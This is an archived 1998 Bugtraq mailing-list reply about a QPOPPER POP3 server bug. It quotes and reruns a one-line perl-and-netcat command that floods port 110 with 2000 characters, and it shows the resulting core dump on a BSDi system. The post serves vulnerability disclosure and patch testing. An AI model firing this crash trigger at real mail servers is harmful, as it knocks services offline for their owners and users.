[7063] in bugtraq
Re: QPOPPER problem....
daemon@ATHENA.MIT.EDU (Jason Ackley)
Sat Jun 27 13:31:13 1998
Date: Sat, 27 Jun 1998 09:35:54 -0700
Reply-To: Jason Ackley <jason@ACKLEY.NET>
From: Jason Ackley <jason@ACKLEY.NET>
X-To: Tom Brown <tbrown@BAREMETAL.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980627012343.1876C-100000@tom2.baremetal.com>
On Sat, 27 Jun 1998, Tom Brown wrote:
<snip>
> perl -e 'print "e"x2000,"\r\nQUIT\r\n";' | nc -i 2 target 110
>
> assuming you have netcat (nc) on your system... if not, just
> telnet to your server and paste something like 20 lines of solid
> characters into your telnet window... You'll get the -ERR
> response back... at which point unpatched servers should core
> dump... and you get "Connection closed by foreign host."
Stock BSDi 3.0(3.1) all the latest patches(M310-034) DOES core dump , but
does not print out the 'ERR', so BSDi people may want to keep that in
mind..
Example:
$ perl -e 'print "e"x2000,"\r\nQUIT\r\n";' | nc -i 2 localhost 110
+OK QPOP (version 2.2-krb-IV) at llama.ackley.net starting. <<v2.2
<8667.898965122@llama.ackley.net>
$ ls -l /pop* ; date
-rw------- 1 root wheel 155648 Jun 27 09:32 /popper.core
Sat Jun 27 09:32:11 PDT 1998
$
I also tested with 2.4, and 2.41beta1, applying patches now and will see
what it does..
Cheers,
-----
Jason Ackley
